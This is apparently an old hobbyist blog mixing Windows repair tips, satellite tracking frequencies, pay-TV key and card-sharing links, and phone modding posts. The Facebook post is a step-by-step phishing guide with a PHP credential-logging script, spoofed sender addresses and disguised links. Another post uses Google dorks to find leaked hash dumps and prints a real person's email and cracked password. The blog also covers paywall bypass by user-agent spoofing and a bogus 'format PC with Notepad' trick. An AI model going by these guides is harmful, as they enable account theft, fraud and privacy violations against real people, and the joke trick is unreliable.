DOWNLOAD SECTION

Tuesday, November 15, 2011

HOW TO FIX CANNOT FIND BOOTMGR

Fixing "BOOTMGR is missing" Error While Trying to Boot Windows 7 or Vista If your Windows 7 or Vista computer has encountered the dreaded “BOOTMGR is missing” error, you aren’t alone. If the problem isn’t hardware related you can fix it with relative ease as long as you have a Windows DVD handy. If you don’t have one, you can create a Windows Vista repair disk using our guide. image Boot off the Windows Vista DVD and then click Next at the first prompt: You should see a link in the lower left-hand side for “Repair your computer” The installation process will attempt to find your Vista installation directory. If there’s more than one in the list, select the correct one and then use the Next button again. Click the first link for “Startup Repair” The installation process will repair the system, and then prompt for you to reboot. Alternatively you could have chosen the Command Prompt option instead, and use the following command to fix the boot options only: bootrec /fixboot At this point you should be able to reboot your computer, remove the DVD and everything should be working. If not, then head over to our forums and ask your question there. We’ve got some top-notch geeks over there!

Monday, November 14, 2011

facebook accounts hacking stunts using notepad

Facebook Accounts. ONE!: go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad. TWO!: Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes. you should find this The big red ring that circles the "action=" you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as "index.PHP" (not htm!) THREE!: Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. Then copy and paste in the notepad: $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> Save this as "next.php" Note: for security you should rename "passwords.txt" to something else. now make a text file called "passwords.txt" or w£ver you renamed the file to in the "next.php", leave this document blank. FOUR!: Upload the 3 files "index.php", "next.php" and "passwords.txt" (or w£ver the password file is called) to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com. When you made an account you should upload the 3 files. Congratz. You have yourself a working Phisher site! FIVE!: now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six. SIX!: Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET! remove the hyperlink from this link: http:/www.facebook.com/n/?reqs.php Mark it and push the Add hyperlink button Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php but lead to your phisher page.. Thats pretty kewl. Now i belive your ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it. courtesy guruslodge

hacking e-mail account using google dorks

Hello Lodges! Today im gonna show you how to hack email accounts using some special google dorks,remember google is our friend Requirements: Google Dorks: Quote ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e Quote ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password Quote ext:sql intext:@hotmail.com intext:password Online hash cracker: http://md5crack.com/ Ok lets begin: Lets go to http://www.google.com and paste one of our dorks This image has been resized. Click this bar to view the full image. The original image is sized 1024x573. Select one of displayed pages,as you see we now have a bunch of email accounts+ hashes This image has been resized. Click this bar to view the full image. The original image is sized 1024x573. I selected a random account zhaokailun92@yahoo.com.cn d2491b289b6be1fd0bb0c8d60 e053d3d This image has been resized. Click this bar to view the full image. The original image is sized 1024x573. As you see we just hacked our fist account: Email:zhaokailun92@yahoo. com.cn Password:19920707 Its very easy,have fun and enjoy unlimited accounts

Sunday, November 13, 2011

backdoor to websites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first.... The lesson you should have learned here is: Obviously Google can go where you can't. Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure. Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe. How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.regand merge it into your registry. Code: [Select] Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent] @="Googlebot/2.1" "Compatible"="+http://www.googlebot.com/bot.html" Voila! You're done! You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site... To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry: Code: [Select] Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent] @="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Ps: Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension from this url: help://chrispederick.myacen.com/work/firefox/useragentswitcher/download/ courtesy Babadinho

Saturday, November 12, 2011

Modding .exe files

How to modify *.exe files learn how to change *.exe files, in 5 easy steps: 1) Don't try to modify a prog by editing his source in a dissasembler.Why? Cause that's for programmers and assembly experts only. try to view it in hex you'll only get tons of crap you don't understand. First off, you need Resource Hacker(last version). It's a resource editor- very easy to use, You can download it at http://www.users.on.net/johnson/resourcehacker/ 2) Unzip the archive, and run ResHacker.exe. You can check out the help file too 3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one. 4) In the left side of the screen a list of sections will appear. The most common sections are -String table; -RCData; -Dialog; -Cursor group; -Bitmap; -WAV. *Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with. *String table: a bunch of crap, useful sometimes, basic programming knowladge needed. *RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more! *Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done! *Cursor group: Change the mouse cursors used in the program just like you would change the icon. *Bitmap: View or change images in the programs easy! *WAV:Change the sounds in the prog. with your own. 5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc. TIP: To change a window title, search for something like: CAPTION "edit this". TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as). TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog. TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure. courtesy babadinho

How to format pc with Notepad

>ENTER NOTEPAD >TYPE THIS IN 010010110001111100100101010101010100000111111 00000 >SAVE AS gidebone.exe > THEN LAUNCH GOODLUCK

Saturday, September 24, 2011

Updates on patch 4 Strong Receivers

check out this website wizkid.persiangig.com and then browse thru patch for africa there u will download for your strong receiver

Getting internet from the receiver

Connection Requirements and Overview Connection Requirements SPLITTER LINKSYS CABLE MODEM RJ – 45 NIC Cable Ethernet Cable Router(WIRELESS OR WIRED if you intend to use more than one pc) DECODER(mytv, hitv, dstv, daarsat etc) Coaxial to RJ-45 converter or adapter COAXIAL CABLES Overview SPLITTER There are many types of Satellite Decoder Splitter, you buy your favorite at the shops where it ’s been sold What do we use the Splitter for? This enables you to create a parallel connection for the coaxial cable (this is the cable that is used to connect your decoder to the TV and as well as the decoder to the Dish hanged outside).the splitter will share the signal that comes from the dish outside between the TV and the Router cable modem, which will convert the signal to an internet signal LINKSYS CABLE MODEM Definition of a Cable Modem: A cable modem is a device that delivers high-speed Internet connectivity via a cable television company which serves as the Internet service provider (ISP). A cable modem requires a subscription to cable Internet service, and will not function by simply connecting it to a cable TV (CATV) feed. Externally, a cable modem resembles a DSL modem. The coax cable that brings in the digital CATV signal provides a channel for upstream and downstream Internet service. This does not interfere with television, as there is plenty of "real estate" or bandwidth space on the coax cable to handle both TV and Internet signals. Why Linksys Cable Modem: The Linksys Cable Modem does not require you to pay any additional separate monthly subscription to the cable company, you only need to connect it with your current subscription with your satellite cable TV provider which will only work with a Coaxial Cable. RJ – 45 NIC Cable This is a typical networking cable which we will use to network all the network devices that we have listed above such as the Router (Cable Modem), we will use it to make a connection from the Router to the computer to transmit internet. Ethernet Cable Ethernet cables connect network devices such as modems, routers, and adapters. They transmit data using the Ethernet protocol. Most Ethernet cables have RJ-45 jacks on both ends, each with 8 pins. (They look similar to telephone jacks, which use 4 pins or 6 pins.) • Equipment using an Ethernet cable is referred to as wired. • Wireless equipment uses radio waves in place of some (or all) Ethernet cables. A network device that uses both Ethernet and wireless connections is usually called just wireless. The Physical Ethernet Cables • Use Cat 5 cables. (Cat 5 is a measure of quality, meaning that it supports traffic up to 100 MB / sec.) These are also called 10/100 Base-T Cat 5 cables. • Some Ethernet cable wires crises-cross internally, others are straight through, meaning that pin 1 is wired to pin 1 on the other end, etc. A port (socket) for a straight through Ethernet cable is sometimes called an uplink port. If you aren't sure about a cable, and you can see the inside wires' colors, hold the two ends of the plugs up, so the same side of the plug is facing you. Router A router is used to transmit internet to more than 1 computer system on a network setup, this enables you to network your connection to other system (PCs). This is also known as cable modem. The connection runs the incoming cable connection to an external cable modem, which has an Ethernet connection to a router, which then connects DECODER A decoder is a device which is used to decode the satellite signal receive from the satellite dish into a video, the decoded signal converted into video is what we receive on our TV, The purpose of we connecting to the internet with a decoder is to convert your decoder to a Modem, a cable decoders is a modem because it modulates and demodulates, but it also functions as a tuner, a network bridge, an encryptor etc. To connect your PC or laptop to a decoder to access the net, you do not use a serial port as with dialup modem. COAXIAL CABLES This connect the decoder to the splitter and one end of the cable goes into the TV while the other end goes to the WAN port of the router (Linksys Router) Things to take Note before buying all the equipments required for setup: • I always recommend running a router between a cable modem and a PC because a router not only allows more than one PC to be connected, but also provides a robust hardware firewall that helps shield your PC(s) connected to it from internet – based attacks. • You can directly connect PCs to a cable decoder using USB; I do not recommend that option because it precludes using a router (cable modem) • Some cable modems have a built – in router, in which case you don’t need to purchase a separate one. If your computer doesn ’t include an Ethernet adapter built into the motherboard or a separate Ethernet card, you can install an Ethernet card into an available internal expansion slot or use a USB – based Ethernet adapter instead. I use a USB - based Ethernet adapter on my HITV decoder. • The cable modem connects to the CATV network using the same coaxial cable connection as your cable TV. The steps to Connection The steps to Connection Step 1 Coaxial Cable cord SplitterPort Connect the coaxial cable from your dish to your satellite decoder splitter( i.e the “in” part) and then connect one cable from the first “out” port to your decoder and the one from the second port to your Linksys modem; the cable can be purchased from any shop where they sell cable decoder while one of the other coaxial cable cords is connected to your television to watch satellite stations. Step 2 Coaxial Cable cord LINKSYS ROUTER Connect the second Coaxial cable cord from the splitter to WAN port of your router (Linksys Router) Step 3 Coaxial Cable cord If your cable modem does not have an inbuilt router facility, you will need to connect your cable Modem to the CATV network of your router using the same coaxial cable connection as your TV, but might need to convert it Step 4 Ethernet Cable LINKSYS ROUTER Connect the Ethernet Cable from the router to your computer system, which can stand as a client if you are using only one computer or server if you are networking more than one system, make sure that your computer has an inbuilt Ethernet adapter on the Motherboard or a separate Ethernet card, you can also install an Ethernet Card into an available internal expansion slot or you can alternatively use a USB – Based Ethernet Adapter instead. In our connection we use a USB –based Ethernet adapter on HITV Decoder Step 5 LINKSYS ROUTER RJ -45 Cable At the back of the Linksys Router there are several ports, port 1 – 4 Stand as the LAN(Local Area Network) Port which can be used to connect 1 -4 CPU to the router with an RJ -45NIC Cable, in most cases the cables comes with the router when you purchase it. Connect 1 -4 CPU to the LAN Port of the router with your RJ -45 Cables, please don ’t mistake it with the Ethernet cable, as is only to be used to connect the computer which is the server to the Router for network routing and also note that each of the CPU that connect to the Router LAN Port with the help of RJ-45 must have an inbuilt Network card install in them, while the server should have an Ethernet card adapter install on the board as mentioned earlier. Step 6 The fifth port of the Linksys Router which stand as the WAN Port (Wireless Access Network) Connect the second coaxial cable that comes from the splitter to the WAN Port of the Router, but note that you need a converter which is an adapter that convert the coaxial cable to RJ -45 cable since the Router WAN port does not have a direct port for a coaxial cable Step 7 The sixth port of the Linksys Router which is called the UplinkPort, the port can be connected to a Hub or a Switch to enable additional users or computers within the network range to share with the internet of your decoder via wireless access System Configuration Steps 1. Start up your computer that we call the server, and click on the start button and then click on control panel 2. Click on Network connection from the control panel tab 3. Click on Create a new Network connection from the Network Connection from the control panel tab 4. Select the Connect to the Internet Radio button and then click on Next button 5. Select the Choose from the a list of Internet Service providers [ISPs] radio button and click on Next button 6. Finally Click on Finish button, Then the connection will then come up 7. Open up your Internet Browser and start browsing Browsers Compatibility (1) Internet Explorer (2) Google Chrome (3) Opera (4) Firefox And much more Operating System Compatibility (1) Windows Operating System (2) Linux Operating System What can this Internet Technology be used for? (1) Personal Usage (2) Group Usage in an Organization or Company (3) Cyber Café (4) BusinessCenter for Email Service and Internet Calls Benefits of using this Technology (1) Pay only monthly subscription for your cable TV and it covers the Internet Bill (2) Browse with a very fast internet speed of 4 mbs download speed (3) Connect large number of Computer systems with the help of a Network devices (4) Connection configuration is simple and easy (5) You can watch Cable TV while browsing the internet at the same time without conflict (6) No downtime for internet connection except if your subscription as elapsed, or one of the connection devices gets faulty. (7) You can buy two decoders to setup a mini cyber café and cable TV football center at the same time

Friday, September 9, 2011

Important Sites Updated

http://www.microbox4u.com/ http://micro-box.weebly.com/ http://www.dishpointer.com/ http://micro-box.weebly.com/software-installation.html OFFSET DISH CONFIG AND SET UP TUTORIALS http://www.satsig.net/22-deg-offset-dish.htm http://www.uksatellitehelp.co.uk/2007/08/12/satellite-alignment-calculator-v2/

Tuesday, September 6, 2011

Upgrading your DSTV smart cart to work with Strong 46..

God,your stars and maybe me later.If it doesn't,don't loose hope.Just keep exploring. 1.Copy the 63x file to your pendrive 2.Go to the data tranfer menu and highlight the file 3.Press the button that represents upload key not the one that represents upload stb(cause that won't work). 4.Exit and restart the machine *Remember to remove your smartcard before you try this *Only try it on a genuine strong receiver and *No one should ask me for that software.-I don't have it and i don't need it. w6 is easy 2 install lik mytv just put your lnb to 7 o'clock after dat track astra2b where muiti tv dey after dat move your dish upward small u w hit green like 68 or 70%.am using 60cm dish.fta 4eva all pls re-scan 12728V30000 on w3a for crtv cameroun Like I mentioned before, I tried 4 different LNB, PRime focus, Fuji, Premium 2 HD and Premium Super HD LNB. The result is here below by using 12207H27500 as primary frequency; 1. Prime focus did not give me any signal. 2. Fuji LNB gave me the signal up to 50% 3. Premium 2 HD gave a signal up to 53% to 54% (fluctuating) 4. Premium Super HD gave me up btw 54% to 55% (Fluctuating as well). There is another LNB I used as well which give me signal up to 51%. I am presently using the premium Super HD. I am presently watching 47 channels free including all MBC channels. I av 6 JSC Sports ( JSC sports 1, 2, +1, +2, +3,+4 and Global Sport) including AD Sport TV and two extra sports stations. I am still working on 11958V27500 where we av other JSC sport +5 to +11. By the grace of God, I shall record success.

Saturday, July 23, 2011

HTC

For all the users who use HTC Wildfire, here’s a great news for all you people as you can now taste your HTC Wildfire with the latest Cyanogen Mod 7 ROM so that you can get out of that boring Eclair 2.1 interface with the advanced 2.2 interface plus many tweaks which will improves the overall UI and also the speed and the battery performance is optimized after installing the latest Cyanogen Mod 7 build of software. Please note that before proceeding to install the Cyanogen Mod 7 firmware, you will have to ensure that you have rooted your HTC Wildfire phone and also you have to make sure that you have taken a backup of all data in your phone including your contacts, messages and applications. Please note that if you have Cyanogen Nightly build then you need to remove the same.

If you have synced your phone with your Google account, your contacts, calendar, Gmail, and some Google data will not be lost and will come back after the next sync. Alternatively, you can also transfer all the phone contents in your SD card as the SD card contents are not wiped off but it’s recommended to back up that too as in an unlikely event you may lose all the details in your phone as well as in the SD Card. Please note that for rooting your HTC Wildfire, you will have to find the same procedure which is followed for HTC Aria. So, read the instructions to root for HTC Wildfire carefully and then follow the same.

After rooting HTC Wildfire, let’s see on how you can install the latest version of Cyanogen Mod 7 which comes with added battery power and other tweaks which also improves the overall speed and user interface. Please note that before proceeding to install the Cyanogen Mod 7 firmware, you will have to ensure that you have rooted your HTC Wildfire phone and also you have to make sure that you have taken a backup of all data in your phone including your contacts, messages and applications.

Also, note that if you have synced your phone with your Google account, your contacts, calendar, Gmail, and some Google data will not be lost and will come back after the next sync. Alternatively, you can also transfer all the phone contents in your SD card as the SD card contents are not wiped off but it’s recommended to back up that too as in an unlikely event you may lose all the details in your phone as well as in the SD Card.

Before proceeding you will have to install the ClockworkMod recovery in your phone which can be downloaded from the Android Marketplace after which you can flash your device out of choosing from any one method of your choice. If you have already installed the Clock work mod recovery application then you need not follow the below procedure.

cyanogenmod

Procedure to install clockwork Mod recovery in HTC Wildfire:

Open Android Market place from your HTC Wildfire and search for “ROM Manager”. Now download this application and install the same.
After installing the application, open the same and select the “Flash ClockworkMod Recovery” option from the list of options in the Wildfire to proceed.
Now, select the device “HTC Aria” after which you need to accept the root permission which will be popped up in the next step after selecting the device. If it prompts for the Super user access then you will have to make sure that you choose “Remember” or “Always” option before you select the “Allow” option.
Some of the users have complained about some problems like freezing and muting of device or even force close errors, in this case it’s advised to restart the device and then try the same or if you see any notification of force close error then you can do the same and then repeat the above procedure to finish the process. If the clockwork mod gets flashed successfully then you will get a message that “Successfully flashed ClockworkMod recovery” or else you will have to repeat the process.

Procedure to flash Cyanogen Mod on your HTC Wildfire:

So, now after successfully flashing the Clockwork mod recovery, you now have to launch the ROM Manager app and then you will have to choose the option Flash “Clockwork Mod recovery” for updating the latest version.
Now, select the download ROM option from the main menu which is there in the ROM Manager after which you will have to choose the “Cyanogen Mod” option from the list after which simply choose the latest version of Cyanogen mod from the menu itself. Please note that if you want the default Google apps too along with the cyanogen mod then you will have to select the Google Apps option too in the list.

recovery mode

After downloading the required files, you will have to “Backup existing ROM” and also need to select the “Wipe Data and Clear Cache” option if prompted by the super user. After you select these options, the Wildfire will get restarted and will reboot in the recovery mode wherein you will have to select “Wipe Data and Clear Cache” option from the menu and select Cyanogen Mod 7 file to install after which again the wildfire will be rebooted with Cyanogen mod successfully installed in it.

Via Recovery Method:

If you are unable to install from the above method then you can install the latest Cyanogen mod 7 with the help of recovery method, please note that if from above method the cyanogen mod 7 is installed perfectly then you don’t need to follow the below procedure.
Download the latest version of Cyanogen Mod which is Version 7 along with the Google Apps for your device from your computer.

clockwork mod recovery

Now, place this Cyanogen mod update.zip file at the root of the SD card along with the GoogleApps.zip in the root of your SD Card.
After this you will have to boot the device in the clockwork mod recovery and once the device boots in the Clockwork mod Recovery, with the help of side volume buttons to move around, and either the power button or the trackball to select from the list of options.

Select “Wipe data/factory reset” and choose “install zip from SD card” and then choose “choose zip from SD card”. Now, you will have to choose the “Cyanogenmodupdate.zip”. After installing this, you will have to install the Google Apps by performing steps again by choosing the GoogleAppsupdate.zip after this you need to select “Ok” option after which you need to go back to the main menu and select “Reboot system now” after which the device will be rebooted and you will see that the Cyanogen mod is successfully installed on your device.

Badr

@all,
The migration of my 3m fibre from 7W to 26E is now finally complete. And as promised,
here are the details:

To move from nilesat to badr, remember that your east is where the sun rises in the morning
(elementary stuff?). Ok, try and track dstv using any of the available tps eg (12034v, 27500sr).
Make sure your signal quality is at the fullest bar (98% for STRONG DECODER). After confirming
that your LNB and dish are working properly, change the tp to your badr tracking tp. For best
results, use any of the following frequencies: 12303H, 27500sr (press tv) or 12284v, 27500sr
(dena tv) or 12322v, 27500sr (canal+). In my own case, it was the first tp that was used.

From DSTV position, raise the dish up slightly to your right while facing east. You should be able
to hit full bar on any of the above tps. If not, then check your dish alignment or tweak your LNB.
After hitting full bar, type in 11919H, 27500sr (MBC) on your decoder. Adjust until you get at least
65% quality.

After that check 12703H, 27500sr (BBC world). Make sure it is at least 55% quality.
Finally check 12130v, 27500SR (Dubai one). This seems to be one of the weakest tps in the line
up and depending on your location you may not get more that 50% quality on 3m.

All that remains is to tighten up the bolts and disconnect your tv. Job complete!

NOTE: This goes to newbies. Don't use the first tp (11727h 27500sr) that appears on your
strong decoder badr list of channels to track. This is not a very reliable tp to use and depending on
what time of day, it usually goes off and on. If you use the first or second tps that i posted above,
it will be almost like you're tracking DSTV or MYTV because the signal will come out fully to 98%
especially if you're using strong decoder for tracking.

TRacking and hunting

@all,
The migration of my 3m fibre from 7W to 26E is now finally complete. And as promised,
here are the details:

To move from nilesat to badr, remember that your east is where the sun rises in the morning
(elementary stuff?). Ok, try and track dstv using any of the available tps eg (12034v, 27500sr).
Make sure your signal quality is at the fullest bar (98% for STRONG DECODER). After confirming
that your LNB and dish are working properly, change the tp to your badr tracking tp. For best
results, use any of the following frequencies: 12303H, 27500sr (press tv) or 12284v, 27500sr
(dena tv) or 12322v, 27500sr (canal+). In my own case, it was the first tp that was used.

From DSTV position, raise the dish up slightly to your right while facing east. You should be able
to hit full bar on any of the above tps. If not, then check your dish alignment or tweak your LNB.
After hitting full bar, type in 11919H, 27500sr (MBC) on your decoder. Adjust until you get at least
65% quality.

After that check 12703H, 27500sr (BBC world). Make sure it is at least 55% quality.
Finally check 12130v, 27500SR (Dubai one). This seems to be one of the weakest tps in the line
up and depending on your location you may not get more that 50% quality on 3m.

All that remains is to tighten up the bolts and disconnect your tv. Job complete!

NOTE: This goes to newbies. Don't use the first tp (11727h 27500sr) that appears on your
strong decoder badr list of channels to track. This is not a very reliable tp to use and depending on
what time of day, it usually goes off and on. If you use the first or second tps that i posted above,
it will be almost like you're tracking DSTV or MYTV because the signal will come out fully to 98%
especially if you're using strong decoder for tracking.

Yahsat

Some one track Yahsat- 1A (52.5East) TP- 12169 H 27500.
There are about 10 Fox channels.

All the best.
Yahsat beam on the map is misleading. Give it a shot with all you got and you won't regret. Its @ 52e just above nss12 @57e where we have the zuku package.

Friday, July 22, 2011

new frequency

33E TEST TRANSMISSION ON FREQ 10976 H 29998

Tuesday, July 5, 2011

Internet VIA receiver

Get a 2rsr cable and connect male n female then straight to your laptop. Pls i won't entertain questns from those dat normally insult pple but 4 those honest ones u can send in questns, I know u all

Decoder is not needed here. Just check your pc you'll see de 2rsr port then u connect it there via the dongle cable but the head must be change to fit in.

Thursday, June 23, 2011

NEW NILESAT AND RDV KEY

AD sports HD now on Nilesat 201 on TP 12091H27500 and 12111 v 27500

first test carrier on nilesat 201 10.24 WEST is 12073 H 27500

FIRST PRESS 8280 ON UR STRONG TO SEE THE BISS KEY. THEN SCROLL TO THE BOTTOM WHERE U HAVE 00000000000000000 ENTER THE CODE BELOW

RDV 00 01 48 49 00 01 48 49

Tuesday, June 14, 2011

CROSSING CABLES RS232 TO RJ45

http://www.vpi.us/app-rj45-crossover-diagram.html
http://www.aggsoft.com/rs232-pinout-cable/modem-db9-to-db15.htm

EVERYDAY CC CAM SERVERS

http://freecccamservers.com/

CABLE CONNECTION OF THE RJ45

http://www.google.com/imgres?imgurl=http://www.bb-elec.com/images/EthernetRJ45B.gif&imgrefurl=http://www.bb-elec.com/tech_articles/EthernetCables_illustration.asp&h=640&w=570&sz=17&tbnid=IX7_5Cq4ycU85M:&tbnh=90&tbnw=80&prev=/search%3Fq%3DRJ45%26tbm%3Disch%26tbo%3Du&zoom=1&q=RJ45&usg=__sJNIn7D-4MmFAxqmKWdGBGDrz9s=&sa=X&ei=JMf3TdnoJefniAKC0tn9DA&ved=0CFAQ9QEwAw

Thursday, April 7, 2011

sat frequncies

Channels with strong transponders and satellites on which to find them
Hi all,
This post is to help all who want to track the following satellites with ease.The values here are relative to my position,the receiver being used and the lnb type.This was also inspired by a couple of forum mates namely,esuo2,bamboutou,fta.hunter and the guy who wanted to know for sure if i truly had all the birds i claimed i had.

SATELLITE CHANNEL NAME FREQUENCY SIGNAL CHARACTERISTICS
ABS1 FEED 3.821(V)/29.997 L:90%, Q:37%

INTELSAT 7/10c Waqt News 4.004(H)/2.962 L:85%, Q:67%

INTELSAT 7/10k Mana 2 12.575(V)/3.377 L:77%, Q:75%

INTELSAT 906 AFN channels 4.094(V)/3.679 L:89%, Q:70%

INTELSAT 902 CITIZEN 3.837(V)/2.477 L:88%, Q:46%

NSS 12 BFBS channels 3.801(H)/19.998 L:91%, Q:66%

EUTELSAT W7/W4 HiTV channels 12.130(H)/27.497 L:93%, Q:78%

ARABSAT 5A RTM RABAT PN 4.014(H)/6.110 L:88%, Q:75%

ASTRA 2B CRTV 12.599(V)/3.254 L:85%, Q:84%

BADR 5 CANAL+ channels 12.319(V)/27.497 L:87%, Q:62%

EUTELSAT W6 AFLAM tv 11.651(V)/15.713 L:77%, Q:48%

AMOS 5i Reuters WNS 4.172(V)/7.198 L:88%, Q:55%

EUTELSAT W2A STARTIMES 3.927(H)/8300 *L:87%, Q:59%

EUTELSAT W3 TV Madagascar 10.978(H)/3.333 L:86%, Q:65%

ASTRA 4A Top TV 12.525(V)/29.997 L:88%, Q:79%

RASCOM 1 FEED 4.023(H)/9.999 L:85%, Q:45%

INTELSAT 10-01 Nile Life 4.181(V)/21.049 L:92%, Q:48%

ATLANTIC BIRD 3 ortb 4.155(V)/2.288 L:91%, Q:73%

EXPRESS AM44 PLANETA RTR 3.663(H)/10.807 L:88%, Q:65%

INTELSAT 901 ETH.EDU.channels 3.888(V)/26.498 L:89%, Q:54%

NSS 7K CANAL+ channels 11.491(V)/29.997 L:89%, Q:76%

NSS 7C TV Africa 3.725(V)/1.462 L:89%, Q:72%

INTELSAT 907K FEED 11.047(H)/12.713 L:91%, Q:71%

INTELSAT 905 ORTM 4.111(V)/5,750 L:88%, Q:42%

INTELSAT 907 RTP Africa 3.841(H)/10.850 L:87%, Q:50%

INTELSAT 903 RTI premiere 3.743(V)/3.220 L:88%, Q:74%

TELSTAR 11N KidsCo 11.477(H)/19.998 L:85%, Q:57%

NSS 10 Metro TV(GH) 3.806(H)/2.142 L:87%, Q:64%

Legend:V-vertical
H-horizontal
L-signal level
Q-signal quality
*-relative value(didn't slightly adjust dish so signal is in the red)

All values were taken in the evening(a day ago) using a strong srt4910.Depending on the time of day values may fluctuate +/-3%.If you want to know the actual values that correspond to your receiver,just pick a sample satellite and channel with the same name as any of the above and just subtract the difference.Value should the same for all the rest.Also to know the dish size from which the data were taken,compare the information here with the satellites in my signature.
happy hunting.
__________________
60cm dish:Astra 2b
80cm dish:Eutelsat w7
90cm dish:Badr 5
3.1m p.f. srtD10 mesh dish:Nilesat
1.8m p.f. motorized SSS pan dish(perfectly aligned):ABS 1,Intelsat 7/10c,Intelsat 7/10k,Intelsat 17,Intelsat 906,Intelsat 902,Nss 12,Arabsat 5A,Eutelsat W6,Amos 5i,Eutelsat W2A,Eutelsat W3A,Sirius 4/Astra 4A,Rascom 1,Intelsat 10-01,Atlantic 3/c,Express AM44,Intelsat 901c,Nss 7/k,Nss 5,Nss 7/c,Intelsat 905/c,Intelsat 907/c,Intelsat 907/k,Intelsat 903/c,Telstar 11N,Nss 10/c

Here is the link too http://www.rdi-board.com/showthread.php?p=948807&highlight=Strong+tps#post948807

TPA 1,2 tps 11721 v 6282
w7 freebies 12439h23436!
In fact, a combination of Time Movies(10720H27500), Top Movies(10873V27500), AWAZ(10949V27500) & Cliquette(10775H27500) is the bomb!
4111 h 2963(strongestt tp),4085 h 4445, 4079 h 4445 all for ait. W4 FREQ 11784 H 27500

Tuesday, March 1, 2011

psp stunts

google out how to pandorise psp with hack it tools, u can also follow up video tutorial from youtube

i phone tweaks

www.iclarified.com